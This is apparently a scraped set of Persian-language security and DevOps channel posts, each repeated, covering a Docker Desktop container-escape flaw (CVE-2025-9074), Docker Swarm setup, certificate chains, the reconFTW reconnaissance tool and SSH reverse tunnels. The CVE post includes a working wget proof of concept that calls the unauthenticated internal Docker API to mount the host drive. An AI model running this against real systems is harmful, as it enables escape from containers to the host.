🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
🔥10❤1🤮1
🐳 داکر سوارم (Docker Swarm): ارکستراسیون ساده و سریع برای کانتینرها
داکر سوارم یک ابزار قدرتمند و سبک برای مدیریت و ارکستراسیون کانتینرهای داکر است که به شما امکان میدهد کانتینرهای خود را بهصورت خودکار، مقیاسپذیر و امن مدیریت کنید. این ابزار با سادگی و سرعت بالا، گزینهای عالی برای پروژههای کوچک و متوسط است. در ادامه، با ویژگیها، نحوهی راهاندازی و مقایسهی آن با ابزارهای دیگر آشنا میشویم.
💠 چرا داکر سوارم؟
داکر سوارم نسبت به ابزارهای مشابه مثل Docker Compose و Kubernetes مزایای زیر را دارد:
- امنیت بالا: ارتباط بین نودها بهصورت پیشفرض با پروتکل TLS رمزنگاری میشود. سوارم بهطور خودکار گواهیهای امنیتی را مدیریت کرده و امکان چرخش (rotation) آنها را فراهم میکند.
- مدیریت سیکرتها (Secrets): میتوانید کلیدها، پسوردها و اطلاعات حساس را بهصورت رمزنگاریشده ذخیره کنید. فقط سرویسهای مجاز به این اطلاعات دسترسی دارند.
- سادگی و سرعت: برخلاف Kubernetes که پیچیدگی بیشتری دارد، سوارم راهاندازی و استفادهی آسانتری ارائه میدهد.
- مقیاسپذیری: امکان اجرای سرویسها روی چندین نود و مقیاسبندی خودکار را فراهم میکند.
💠 مقایسه با Docker Compose و Kubernetes
- Docker Compose:
ویژگیها: ساده، مناسب برای تست و توسعه روی یک سرور، بدون قابلیت مقیاسپذیری.
مناسب برای: پروژههای محلی و توسعه.
- Kubernetes:
ویژگیها: پیشرفته، قدرتمند، اما پیچیده و سنگین، نیاز به تنظیمات و یادگیری زیاد.
مناسب برای: پروژههای بزرگ و پیچیده.
- Docker Swarm:
ویژگیها: سبک، ساده، سریع، با امنیت بالا و مقیاسپذیری مناسب.
مناسب برای: پروژههای کوچک تا متوسط.
🛠 راهاندازی داکر سوارم
برای شروع کار با سوارم، کافی است چند دستور ساده اجرا کنید:
۱- ایجاد کلاستر سوارم:
این دستور سرور فعلی را به یک نود مدیر (Manager Node) تبدیل میکند و کلیدها و توکنهای امنیتی لازم را تولید میکند. حتی اگر فقط یک نود داشته باشید، سوارم قابل استفاده است.
پس از اجرا، یک توکن نمایش داده میشود که برای افزودن نودهای جدید به کار میرود.
۲- افزودن نود جدید (Worker):
دستور
با این کار، نود جدید به Swarm متصل میشود و میتواند سرویسها را اجرا کند.
۳- ایجاد سرویس به جای Compose:
به جای استفاده از `docker-compose.yml`، میتوانید سرویسها را با دستور زیر ایجاد کنید:
این دستور یک سرویس با ۳ نمونه (replica) از تصویر nginx ایجاد میکند که روی پورت ۸۰ در دسترس خواهد بود.
🔒 تعریف سیکرت (Secret)
برای ذخیره اطلاعات حساس مثل پسوردها:
۱- ایجاد سیکرت:
۲- اختصاص سیکرت به سرویس:
۳- مشاهده سیکرت در کانتینر:
سیکرت بهصورت فایل در مسیر
خروجی:
🚪 خارج شدن یا ترک Swarm
برای خارج کردن یک نود کارگر (Worker) از کلاستر:
برای حذف کامل کلاستر (از نود مدیر):
چرا داکر سوارم انتخاب خوبی است؟
داکر سوارم با ترکیب سادگی، امنیت و مقیاسپذیری، گزینهای عالی برای مدیریت کانتینرها در پروژههای کوچک تا متوسط است. اگر به دنبال راهحلی سبکتر از Kubernetes و قدرتمندتر از Compose هستید، سوارم میتواند نیازهای شما را بهخوبی برآورده کند.
#Docker #DevOps #Orchestration
@Xero_Notes
داکر سوارم یک ابزار قدرتمند و سبک برای مدیریت و ارکستراسیون کانتینرهای داکر است که به شما امکان میدهد کانتینرهای خود را بهصورت خودکار، مقیاسپذیر و امن مدیریت کنید. این ابزار با سادگی و سرعت بالا، گزینهای عالی برای پروژههای کوچک و متوسط است. در ادامه، با ویژگیها، نحوهی راهاندازی و مقایسهی آن با ابزارهای دیگر آشنا میشویم.
💠 چرا داکر سوارم؟
داکر سوارم نسبت به ابزارهای مشابه مثل Docker Compose و Kubernetes مزایای زیر را دارد:
- امنیت بالا: ارتباط بین نودها بهصورت پیشفرض با پروتکل TLS رمزنگاری میشود. سوارم بهطور خودکار گواهیهای امنیتی را مدیریت کرده و امکان چرخش (rotation) آنها را فراهم میکند.
- مدیریت سیکرتها (Secrets): میتوانید کلیدها، پسوردها و اطلاعات حساس را بهصورت رمزنگاریشده ذخیره کنید. فقط سرویسهای مجاز به این اطلاعات دسترسی دارند.
- سادگی و سرعت: برخلاف Kubernetes که پیچیدگی بیشتری دارد، سوارم راهاندازی و استفادهی آسانتری ارائه میدهد.
- مقیاسپذیری: امکان اجرای سرویسها روی چندین نود و مقیاسبندی خودکار را فراهم میکند.
💠 مقایسه با Docker Compose و Kubernetes
- Docker Compose:
ویژگیها: ساده، مناسب برای تست و توسعه روی یک سرور، بدون قابلیت مقیاسپذیری.
مناسب برای: پروژههای محلی و توسعه.
- Kubernetes:
ویژگیها: پیشرفته، قدرتمند، اما پیچیده و سنگین، نیاز به تنظیمات و یادگیری زیاد.
مناسب برای: پروژههای بزرگ و پیچیده.
- Docker Swarm:
ویژگیها: سبک، ساده، سریع، با امنیت بالا و مقیاسپذیری مناسب.
مناسب برای: پروژههای کوچک تا متوسط.
🛠 راهاندازی داکر سوارم
برای شروع کار با سوارم، کافی است چند دستور ساده اجرا کنید:
۱- ایجاد کلاستر سوارم:
docker swarm init
این دستور سرور فعلی را به یک نود مدیر (Manager Node) تبدیل میکند و کلیدها و توکنهای امنیتی لازم را تولید میکند. حتی اگر فقط یک نود داشته باشید، سوارم قابل استفاده است.
پس از اجرا، یک توکن نمایش داده میشود که برای افزودن نودهای جدید به کار میرود.
۲- افزودن نود جدید (Worker):
دستور
join که هنگام init نمایش داده میشود را روی سرور دوم اجرا کنید:docker swarm join --token <TOKEN> <MANAGER_IP>:2377
با این کار، نود جدید به Swarm متصل میشود و میتواند سرویسها را اجرا کند.
۳- ایجاد سرویس به جای Compose:
به جای استفاده از `docker-compose.yml`، میتوانید سرویسها را با دستور زیر ایجاد کنید:
docker service create --replicas 3 -p 80:80 nginx
این دستور یک سرویس با ۳ نمونه (replica) از تصویر nginx ایجاد میکند که روی پورت ۸۰ در دسترس خواهد بود.
🔒 تعریف سیکرت (Secret)
برای ذخیره اطلاعات حساس مثل پسوردها:
۱- ایجاد سیکرت:
echo "mypassword123" | docker secret create app_password -
۲- اختصاص سیکرت به سرویس:
docker service create \
--name my_app \
--replicas 2 \
--secret app_password \
<container>
۳- مشاهده سیکرت در کانتینر:
سیکرت بهصورت فایل در مسیر
/run/secrets/ قرار میگیرد. برای مشاهده:docker exec -it <container_id> cat /run/secrets/db_password
خروجی:
mypassword123🚪 خارج شدن یا ترک Swarm
برای خارج کردن یک نود کارگر (Worker) از کلاستر:
docker swarm leave
برای حذف کامل کلاستر (از نود مدیر):
docker swarm leave --force
چرا داکر سوارم انتخاب خوبی است؟
داکر سوارم با ترکیب سادگی، امنیت و مقیاسپذیری، گزینهای عالی برای مدیریت کانتینرها در پروژههای کوچک تا متوسط است. اگر به دنبال راهحلی سبکتر از Kubernetes و قدرتمندتر از Compose هستید، سوارم میتواند نیازهای شما را بهخوبی برآورده کند.
#Docker #DevOps #Orchestration
@Xero_Notes
🔥5👍2
🔒 زنجیرهی گواهی چیست؟
زنجیرهی گواهی (Certificate Chain) مجموعهای از گواهیهای دیجیتال است که برای ایجاد اعتماد بین یک وبسایت و مرورگر یا دستگاه کاربر به کار میرود. وقتی شما به سایتی با پروتکل HTTPS متصل میشوید، مرورگر شما نیاز دارد تا مطمئن شود گواهی SSL/TLS ارائهشده توسط سایت معتبر است و هویت سایت را تأیید میکند. این اعتماد از طریق زنجیرهی گواهی برقرار میشود که مسیری از گواهی سایت تا یک مرجع صدور گواهی ریشهای (Root CA) را تشکیل میدهد.
💠 مرجع صدور گواهی (CA) چیست؟
مرجع صدور گواهی یا CA (Certificate Authority) نهادی معتبر است که وظیفهی صدور گواهیهای دیجیتال را بر عهده دارد. این گواهیها مانند یک مدرک شناسایی دیجیتال عمل میکنند و هویت یک وبسایت یا سرویس را تأیید میکنند تا کاربران بتوانند با اطمینان به آن متصل شوند.
💠 انواع CA (ریشهای و میانی)
- Root CA (مرجع ریشه): این مراجع در بالاترین سطح اعتماد قرار دارند. کلید عمومی آنها از پیش در مرورگرها و سیستمعاملها (مانند ویندوز، مک، اندروید یا iOS) ذخیره شده است. به عبارت دیگر، دستگاه شما بهطور پیشفرض به این مراجع اعتماد دارد.
- CA میانی (Intermediate CA): به دلایل امنیتی، Root CAها بهصورت مستقیم برای وبسایتها گواهی صادر نمیکنند. در عوض، آنها به مراجع میانی گواهی میدهند، و این CAهای میانی هستند که گواهیهای دیجیتال را برای وبسایتها یا سرویسها صادر میکنند. این ساختار باعث کاهش ریسک و افزایش امنیت میشود.
💠 زنجیرهی گواهی چگونه کار میکند؟
زنجیرهی گواهی مسیری است که مرورگر برای تأیید اعتبار گواهی یک وبسایت طی میکند. این مسیر بهصورت زیر است:
۱- گواهی وبسایت (End-user Certificate): این گواهی توسط یک CA میانی امضا شده و هویت سایت را تأیید میکند.
۲- گواهی CA میانی: این گواهی خود توسط یک CA دیگر (میانی دیگر یا Root CA) امضا شده است.
۳- Root CA: در نهایت، زنجیره به یک مرجع ریشهای میرسد که کلید عمومی آن از قبل در مرورگر یا سیستمعامل ذخیره شده است.
اگر این زنجیره کامل باشد و تمام گواهیها به درستی به Root CA متصل شوند، مرورگر اتصال را امن تشخیص میدهد و علامت قفل سبز یا نشانهای از اتصال امن را نمایش میدهد. اما اگر بخشی از زنجیره (مثلاً گواهی CA میانی) مفقود یا نادرست باشد، مرورگر پیغام خطایی مانند «گواهی نامعتبر» یا «اتصال ناامن» نشان میدهد.
💠 محل قرارگیری CAها
- Root CA: گواهیهای ریشهای از پیش در مخزن اعتماد (Trust Store) مرورگرها و سیستمعاملها ذخیره شدهاند. این مخزن مانند فهرستی از مراجع مورد اعتماد است که دستگاه شما به آنها اطمینان دارد.
- CA میانی: گواهیهای میانی معمولاً همراه با گواهی وبسایت روی سرور سایت نصب میشوند تا مرورگر بتواند زنجیرهی گواهی را تکمیل کند.
💠مثال عملی
فرض کنید شما برای دامنهی
شرکت صادرکنندهی گواهی، یک گواهی دیجیتال برای دامنهی شما (End-user Certificate) ارائه میدهد. این گواهی توسط یک CA میانی امضا شده است. شما باید فایل گواهی CA میانی را نیز روی سرور خود نصب کنید. گواهی CA میانی نیز توسط یک CA بالاتر (یا مستقیماً Root CA) امضا شده است. وقتی کاربری به سایت شما متصل میشود:
۱- مرورگر گواهی وبسایت شما را بررسی میکند.
۲- سپس مسیر امضاها را دنبال میکند تا به Root CA برسد.
۳- اگر زنجیره کامل باشد و Root CA در مخزن اعتماد مرورگر وجود داشته باشد، اتصال امن تأیید میشود و کاربر نشانهای مانند قفل سبز را مشاهده میکند.
💠 خلاصه
زنجیرهی گواهی مسیری است که اعتماد را از گواهی وبسایت تا یک مرجع ریشهای (Root CA) برقرار میکند. Root CAها از پیش در سیستمها و مرورگرها بهعنوان مراجع مورد اعتماد شناخته شدهاند، و CAهای میانی نقش واسطهای بین آنها و وبسایتها دارند. اگر تمام اجزای این زنجیره به درستی در دسترس باشند، اتصال امن برقرار میشود؛ در غیر این صورت، خطای عدم اعتماد ظاهر خواهد شد.
این ساختار تضمین میکند که کاربران بتوانند با اطمینان به وبسایتها متصل شوند و از امنیت ارتباطات خود مطمئن باشند.
اما اگر گواهی CA میانی روی سرور نصب نشده باشد، مرورگر نمیتواند زنجیره را تکمیل کند و خطایی مبنی بر عدم اعتماد به گواهی نمایش میدهد.
#CertificateChain #DigitalSecurity #SSLCertificate
@Xero_Notes
زنجیرهی گواهی (Certificate Chain) مجموعهای از گواهیهای دیجیتال است که برای ایجاد اعتماد بین یک وبسایت و مرورگر یا دستگاه کاربر به کار میرود. وقتی شما به سایتی با پروتکل HTTPS متصل میشوید، مرورگر شما نیاز دارد تا مطمئن شود گواهی SSL/TLS ارائهشده توسط سایت معتبر است و هویت سایت را تأیید میکند. این اعتماد از طریق زنجیرهی گواهی برقرار میشود که مسیری از گواهی سایت تا یک مرجع صدور گواهی ریشهای (Root CA) را تشکیل میدهد.
💠 مرجع صدور گواهی (CA) چیست؟
مرجع صدور گواهی یا CA (Certificate Authority) نهادی معتبر است که وظیفهی صدور گواهیهای دیجیتال را بر عهده دارد. این گواهیها مانند یک مدرک شناسایی دیجیتال عمل میکنند و هویت یک وبسایت یا سرویس را تأیید میکنند تا کاربران بتوانند با اطمینان به آن متصل شوند.
💠 انواع CA (ریشهای و میانی)
- Root CA (مرجع ریشه): این مراجع در بالاترین سطح اعتماد قرار دارند. کلید عمومی آنها از پیش در مرورگرها و سیستمعاملها (مانند ویندوز، مک، اندروید یا iOS) ذخیره شده است. به عبارت دیگر، دستگاه شما بهطور پیشفرض به این مراجع اعتماد دارد.
- CA میانی (Intermediate CA): به دلایل امنیتی، Root CAها بهصورت مستقیم برای وبسایتها گواهی صادر نمیکنند. در عوض، آنها به مراجع میانی گواهی میدهند، و این CAهای میانی هستند که گواهیهای دیجیتال را برای وبسایتها یا سرویسها صادر میکنند. این ساختار باعث کاهش ریسک و افزایش امنیت میشود.
💠 زنجیرهی گواهی چگونه کار میکند؟
زنجیرهی گواهی مسیری است که مرورگر برای تأیید اعتبار گواهی یک وبسایت طی میکند. این مسیر بهصورت زیر است:
۱- گواهی وبسایت (End-user Certificate): این گواهی توسط یک CA میانی امضا شده و هویت سایت را تأیید میکند.
۲- گواهی CA میانی: این گواهی خود توسط یک CA دیگر (میانی دیگر یا Root CA) امضا شده است.
۳- Root CA: در نهایت، زنجیره به یک مرجع ریشهای میرسد که کلید عمومی آن از قبل در مرورگر یا سیستمعامل ذخیره شده است.
اگر این زنجیره کامل باشد و تمام گواهیها به درستی به Root CA متصل شوند، مرورگر اتصال را امن تشخیص میدهد و علامت قفل سبز یا نشانهای از اتصال امن را نمایش میدهد. اما اگر بخشی از زنجیره (مثلاً گواهی CA میانی) مفقود یا نادرست باشد، مرورگر پیغام خطایی مانند «گواهی نامعتبر» یا «اتصال ناامن» نشان میدهد.
💠 محل قرارگیری CAها
- Root CA: گواهیهای ریشهای از پیش در مخزن اعتماد (Trust Store) مرورگرها و سیستمعاملها ذخیره شدهاند. این مخزن مانند فهرستی از مراجع مورد اعتماد است که دستگاه شما به آنها اطمینان دارد.
- CA میانی: گواهیهای میانی معمولاً همراه با گواهی وبسایت روی سرور سایت نصب میشوند تا مرورگر بتواند زنجیرهی گواهی را تکمیل کند.
💠مثال عملی
فرض کنید شما برای دامنهی
example.com یک گواهی SSL/TLS خریداری میکنید:شرکت صادرکنندهی گواهی، یک گواهی دیجیتال برای دامنهی شما (End-user Certificate) ارائه میدهد. این گواهی توسط یک CA میانی امضا شده است. شما باید فایل گواهی CA میانی را نیز روی سرور خود نصب کنید. گواهی CA میانی نیز توسط یک CA بالاتر (یا مستقیماً Root CA) امضا شده است. وقتی کاربری به سایت شما متصل میشود:
۱- مرورگر گواهی وبسایت شما را بررسی میکند.
۲- سپس مسیر امضاها را دنبال میکند تا به Root CA برسد.
۳- اگر زنجیره کامل باشد و Root CA در مخزن اعتماد مرورگر وجود داشته باشد، اتصال امن تأیید میشود و کاربر نشانهای مانند قفل سبز را مشاهده میکند.
💠 خلاصه
زنجیرهی گواهی مسیری است که اعتماد را از گواهی وبسایت تا یک مرجع ریشهای (Root CA) برقرار میکند. Root CAها از پیش در سیستمها و مرورگرها بهعنوان مراجع مورد اعتماد شناخته شدهاند، و CAهای میانی نقش واسطهای بین آنها و وبسایتها دارند. اگر تمام اجزای این زنجیره به درستی در دسترس باشند، اتصال امن برقرار میشود؛ در غیر این صورت، خطای عدم اعتماد ظاهر خواهد شد.
این ساختار تضمین میکند که کاربران بتوانند با اطمینان به وبسایتها متصل شوند و از امنیت ارتباطات خود مطمئن باشند.
اما اگر گواهی CA میانی روی سرور نصب نشده باشد، مرورگر نمیتواند زنجیره را تکمیل کند و خطایی مبنی بر عدم اعتماد به گواهی نمایش میدهد.
#CertificateChain #DigitalSecurity #SSLCertificate
@Xero_Notes
🔥6
💠 reconFTW
ابزار reconFTW فرآیند شناسایی و جمعآوری اطلاعات درباره اهداف را بهصورت خودکار انجام میدهد. این ابزار با بهرهگیری از روشهای پیشرفته، امکان شناسایی زیرساختهای شبکهای و بررسی آسیبپذیریهای متعدد را فراهم میکند و اطلاعات جامعی را در اختیار کاربران قرار میدهد تا در تحلیل و ارزیابی اهداف خود پیشرو باشند.
برای شناسایی زیرساختها، این ابزار از تکنیکهای متنوعی مانند شناسایی غیرفعال، جستجوی فراگیر، تغییرات در نامهای دامنه، استفاده از دادههای گواهینامههای شفافیت، تحلیل کد منبع وبسایتها، بررسی دادههای تحلیلی، و کاوش سوابق DNS بهره میبرد. این روشها به شناسایی زیرساختهای کلیدی و مرتبط با هدف کمک میکنند و اطلاعات ارزشمندی را برای تحلیل رقابتی ارائه میدهند.
علاوه بر این، ReconFTW قابلیت بررسی انواع آسیبپذیریهای امنیتی را داراست، از جمله حملات اسکریپتنویسی بینسایتی (XSS)، تغییر مسیرهای غیرمجاز، تزریق سرور-کلاینت (SSRF)، تزریق کد در هدرهای HTTP (CRLF)، دسترسی غیرمجاز به فایلهای محلی (LFI)، تزریق SQL، بررسی امنیت پروتکل SSL، تزریق قالبهای سمت سرور (SSTI)، و انتقال منطقه DNS. این ابزار همچنین امکاناتی نظیر جمعآوری اطلاعات از منابع عمومی (OSINT)، کاوش دایرکتوریها، جستجوی هدفمند در موتورهای جستجو (دورکینگ)، اسکن پورتها، ثبت تصاویر از صفحات وب، و اجرای اسکنهای پیشرفته با استفاده از ابزارهایی مانند Nuclei را ارائه میدهد.
🔗 https://github.com/six2dez/reconftw
#Cybersecurity #PenetrationTesting #Reconnaissance
@Xero_Notes
ابزار reconFTW فرآیند شناسایی و جمعآوری اطلاعات درباره اهداف را بهصورت خودکار انجام میدهد. این ابزار با بهرهگیری از روشهای پیشرفته، امکان شناسایی زیرساختهای شبکهای و بررسی آسیبپذیریهای متعدد را فراهم میکند و اطلاعات جامعی را در اختیار کاربران قرار میدهد تا در تحلیل و ارزیابی اهداف خود پیشرو باشند.
برای شناسایی زیرساختها، این ابزار از تکنیکهای متنوعی مانند شناسایی غیرفعال، جستجوی فراگیر، تغییرات در نامهای دامنه، استفاده از دادههای گواهینامههای شفافیت، تحلیل کد منبع وبسایتها، بررسی دادههای تحلیلی، و کاوش سوابق DNS بهره میبرد. این روشها به شناسایی زیرساختهای کلیدی و مرتبط با هدف کمک میکنند و اطلاعات ارزشمندی را برای تحلیل رقابتی ارائه میدهند.
علاوه بر این، ReconFTW قابلیت بررسی انواع آسیبپذیریهای امنیتی را داراست، از جمله حملات اسکریپتنویسی بینسایتی (XSS)، تغییر مسیرهای غیرمجاز، تزریق سرور-کلاینت (SSRF)، تزریق کد در هدرهای HTTP (CRLF)، دسترسی غیرمجاز به فایلهای محلی (LFI)، تزریق SQL، بررسی امنیت پروتکل SSL، تزریق قالبهای سمت سرور (SSTI)، و انتقال منطقه DNS. این ابزار همچنین امکاناتی نظیر جمعآوری اطلاعات از منابع عمومی (OSINT)، کاوش دایرکتوریها، جستجوی هدفمند در موتورهای جستجو (دورکینگ)، اسکن پورتها، ثبت تصاویر از صفحات وب، و اجرای اسکنهای پیشرفته با استفاده از ابزارهایی مانند Nuclei را ارائه میدهد.
🔗 https://github.com/six2dez/reconftw
#Cybersecurity #PenetrationTesting #Reconnaissance
@Xero_Notes
❤2
💠 ریورس تانل SSH
ریورس تانل SSH تکنیکی است که امکان دسترسی به یک سیستم محلی (پشت فایروال یا بدون آیپی عمومی) را از طریق یک سرور راهدور فراهم میکند. برخلاف فورواردینگ معمولی SSH که ترافیک را از سیستم محلی به سرور هدایت میکند، در ریورس تانل، ترافیک از سرور راهدور به سیستم محلی منتقل میشود. این روش برای دسترسی به سرویسهای محلی در شبکههای محدود بسیار کاربردی است.
💠 نحوه کار ریورس تانل
برای ایجاد تونل معکوس، از دستور SSH با گزینه R- استفاده میشود. ساختار دستور به این شکل است:
مثال: اگر سرویسی روی سیستم محلی شما (localhost) و پورت 3000 اجرا میشود و میخواهید از طریق سرور راهدور (remote-server.com) و پورت 8080 قابل دسترس باشد، دستور زیر را اجرا میکنید:
در این حالت، درخواستهای ارسالی به پورت 8080 سرور راهدور به پورت 3000 سیستم محلی شما هدایت میشوند.
💠 کاربردها
- دسترسی به سرویسهای داخلی مانند وبسرورها یا دیتابیسهای پشت NAT.
- مدیریت دستگاههای شبکه از راه دور بدون نیاز به آیپی عمومی.
- اشتراکگذاری منابع محلی با تیم یا سیستمهای خارجی.
ریورس تانل SSH ابزاری انعطافپذیر برای دور زدن محدودیتهای شبکهای است که برای مدیران شبکه و متخصصان فنی راهحلی کارآمد برای دسترسی به سیستمهای محلی ارائه میدهد.
#ReverseTunneling #SSH #NetworkAccess
@Xero_Notes
ریورس تانل SSH تکنیکی است که امکان دسترسی به یک سیستم محلی (پشت فایروال یا بدون آیپی عمومی) را از طریق یک سرور راهدور فراهم میکند. برخلاف فورواردینگ معمولی SSH که ترافیک را از سیستم محلی به سرور هدایت میکند، در ریورس تانل، ترافیک از سرور راهدور به سیستم محلی منتقل میشود. این روش برای دسترسی به سرویسهای محلی در شبکههای محدود بسیار کاربردی است.
💠 نحوه کار ریورس تانل
برای ایجاد تونل معکوس، از دستور SSH با گزینه R- استفاده میشود. ساختار دستور به این شکل است:
ssh -R [remote-port]:[local-host]:[local-port] [user]@[remote-server]
مثال: اگر سرویسی روی سیستم محلی شما (localhost) و پورت 3000 اجرا میشود و میخواهید از طریق سرور راهدور (remote-server.com) و پورت 8080 قابل دسترس باشد، دستور زیر را اجرا میکنید:
ssh -R 8080:localhost:3000 user@remote-server.com
در این حالت، درخواستهای ارسالی به پورت 8080 سرور راهدور به پورت 3000 سیستم محلی شما هدایت میشوند.
💠 کاربردها
- دسترسی به سرویسهای داخلی مانند وبسرورها یا دیتابیسهای پشت NAT.
- مدیریت دستگاههای شبکه از راه دور بدون نیاز به آیپی عمومی.
- اشتراکگذاری منابع محلی با تیم یا سیستمهای خارجی.
ریورس تانل SSH ابزاری انعطافپذیر برای دور زدن محدودیتهای شبکهای است که برای مدیران شبکه و متخصصان فنی راهحلی کارآمد برای دسترسی به سیستمهای محلی ارائه میدهد.
#ReverseTunneling #SSH #NetworkAccess
@Xero_Notes
❤2